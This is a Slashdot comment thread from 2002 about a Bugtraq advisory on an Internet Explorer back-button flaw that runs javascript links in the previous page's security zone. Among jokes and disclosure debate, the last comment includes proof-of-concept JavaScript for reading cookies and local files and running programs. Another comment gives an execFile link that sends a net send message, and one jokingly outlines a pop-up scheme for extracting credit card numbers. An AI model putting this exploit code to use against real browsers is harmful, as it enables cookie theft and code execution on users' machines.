Don't Hit That Back Button

Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."

Re:Using Linux considered harmful

Linux advocacy on IRC, in a nutshell:

Q: Internet Explorer has a lot of security bugs. What do I do?

A: Install Mozilla.

Q: Windows has a lot of security bugs. What do I do?

A: Install Linux.

Q: Somebody cracked into my default installation of Red Hat 6.2. What do I do?

A: Didn't you RTFM? Everybody knows that you have to keep patching the system to keep people out of it! Why don't you go to Windows, dumbass?

Unfair to release the advisory before fix...

[NoMoreNicksLeft]

If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole. SP3 for IE6 patches it up fine though. That's right, when you mouseover the back button, a popup text alerts you that it might be dangerous (that M$ can't be held responsible for damages resulting from its use?). Also, the "Safe Back Button" is now next to it, but to get it out the door in time, they've had to rush. Yes folks, it uses the exact same codebase as the back button, and no, I don't see that as a problem. Besides, if it is, they'll fix it with SP4, and the "Really Safe Back Button". Right along side the other two, for backward compatibility.

Test it out if you have IE

[ekrout]

I copied the source from the (now Slashdotted) page and created an HTML file at http://www.eg.bucknell.edu/~ekrout/IE_Hack.html for those of you with IE to test it out. If you want, reply to this post and let everyone know if it works with your browser, Windows version, etc.

This is a very troubling security hole for Windows users who prefer IE (99.7% of them).

Founder, monolinux

Re:Java's been crashing IE of late

[asv108]

Java is insecure

I think your reffering to JavaScript orginally called livescript by Netscape before the Java buzz hit. JavaScript has nothing to do with Java. Java is relatively secure by most standards.

RTFE (exploit)

[gartogg]

If you read the exploit, you would see why this would not be possible.

You do not need to actually press the button, but you need to do it from a trusted page.

If MS had acted... any number of times...

[Wee]

If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole.

If MS had responded back in November when he made the sploit known, or if they had even thought once about security when designing IE, or if they had any kind of decent security model in the OS, or, or, or... then this never would have happened in the first place and MS wouldn't have to patch the barn door after the horse had left. But don't blame the guy who discovered this by trotting out that "don't tell anyone about the security hole until the vendor can fix it" pablum. Security through obscurity isn't, especially when that obscurity is driven my the needs of the marketing group.

You find a hole, you do due dilligence, they don't respond (he gave them months to fix it fer cryin' out loud), you publish. Then, most likely, the vendor publishes a fix based on the real needs of users and not the perceived needs of some business unit looking at a bottom line.

It boggles my mind that one could have a machine rooted simply by browsing the web. A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates... I didn't even have the energy to respond. And I'm all for people running with whatever works for them, but at least I know for a fact that Opera on my machine runs in userland and won't get me rooted. And hopefully, using your favorite browser won't mean data loss and/or a re-image of the OS as well.

But to blame the guy who discovered it? I mean, honestly, for fsck's sake: we're talking about a web browser, you know? Completely compromising a machine via a back button? And it's been known for five months?!? At least MS could tell users to run another browser until they can fix the issue. Or turn scripting off. Or whatever. The fact that it could happen in the first place is just obscene. Or criminal. MS leaves a bad taste in my mind sometimes...

-B

Re:A complete list

[mrogers]

Other then just clicking on the MS link, is there a site devoted just to the fuckups of MS?

Yes there is, and you're looking at it right now.

Re:What are the odds...

[SaDan]

Read the Bugtraq submission!

Title: Using the backbutton in IE is dangerous.
Date: [2002-04-15]
Software: At least Internet Explorer 6.0.
Tested env: Windows 2000 pro, XP.
Rating: Medium because user interaction is needed.
Impact: Read cookies/local files and execute code
(triggered when user hits the back button).
Patch: None.
Vendor: Microsoft contacted 12 Nov 2001, additional
information given 25 Mar 2002.
Workaround: Disable active scripting or never
use the back button.
Author: Andreas Sandblad, sandblad@acc.umu.se

MS was notified late last year... Just over five months ago.

Read, people... Read, then make comments. It's not that difficult.

Quick patch for the bug

[cscx]

Here is a way do disable this nasty bug. It should work in all affected versions of IE:

1. Right click the toolbar, and select "Customize"

2. Select "Back" in the list marked "Current toolbar buttons"

3. Click the "Remove" button.

4. Click close.

There! Now that bug has been squashed. I suggest you implement this in all corporate deployments of IE pronto.

Re:On a (somewhat) related topic...

[WhaDaYaKnow]

users who get stuck on pages simply close the browser window.

Which is exactly what you want because this generates an onunload event. At which point you can open a new window, which should preferably load a pop-under window, which has a hidden Flash object that plays a very loud siren.

Then when the user moves the mouse cursor outside of the window, you maximize the window and load a duplicate pop-under, which also plays the siren. Because although one siren is good, two sirens are better.

Now that you start getting the attention of the user, you load a full screen pop-up window, without borders, and in this window you will load an images to make it look exactly like a browser.

In the meantime the volume on the (hidden) Flash players should have increased to the absolute maximum, and you could even consider switching one over to a screaming cat. (Obviously the onunload handlers for the pop-under windows should open AT LEAST two pop-under of similar quality.)

Back to the front page,- now that you have full control over the browser look and feel, you can conveniently move any 'close' or 'back' buttons out of the way as soon as the mouse pointer gets too close.

At this point in time, you have increased the chances of getting a credit card number out of the user significantly, so it's up to you to present the user with the ability to enter their information.

The best way to achieve this is to just have the text box that you want filled out follow the mouse. Not all users are very smart, so keep what you want done obvious.

Once the information is obtained, change the page to read something among the lines that the user should absolutely NOT attempt to do anything, but most of all, not close any windows!, because his credit card may be charged twice.

After a last check that all pop-unders with screaming Flash players are still going strong, you are now done.

Is there a real exploit here?

[Chuck+Chunder]

Even if an executable were encoded in the link would the end user not be simply warned that they are attempting to download an executable, as with any other URL that served them an executable?

It's only a security hole if delivering the content via the data URL is treated differently than getting it via an http, ftp or javascript one.

Now if only all porn site admins would....

[coene]

.. do a little something like this:

<a href="javascript:execFile('file:///c:/winnt/system 32/net send * \"HI EVERYBODY IN THE OFFICE! I AM LOOKING AT PORN!\"')">CLICK FOR BOOBIES</a>

heh

[elmegil]

Good thing security is MicroSoft's number one focus now!

One reason I love Opera

[Arker]

Opera cured that problem quite effectively. Since I started using it as my main browser, I can't remember finding a page where back wouldn't work properly. It ignores scripts that try to take it over, and it tracks documents-in-frames properly too, you can go forward and back independently in different frames on framed pages.

IE 5 for Mac OS X bug!!!

[toupsie]

Damn it! I went to the test page and tried all the links with the back button. Not one of them worked. Not a one. There is a bug in the bug when it comes to Mac OS X and Internet Explorer. Once again as a Mac user, I am getting deprived of the same experience that Windows users get with Internet Explorer.

This is a major one ,, user interaction not needed

[rahul_inblue]

The flaw can be exploited *with out* user interaction ,, use about: and use a body-onload javascript to execute the back button ,, poc html page is attached. u know what this means :P .

----cut here---

Press link and then the backbutton to trigger script.

Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)


Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)


Read c:\test.txt (needs to be created)


Read Google cookie

// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "about: ";
function execFile(file){
alert (badUrl);

s = '';
backBug(badUrl,s);
}
function readFile(file){
s = '';
backBug(badUrl,s);
}
function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")' )";
s+= ";history.back();} else 'location=\""+url
s+= "\";document.title=\""+page+"\";';";
location = s;
}

---cut here---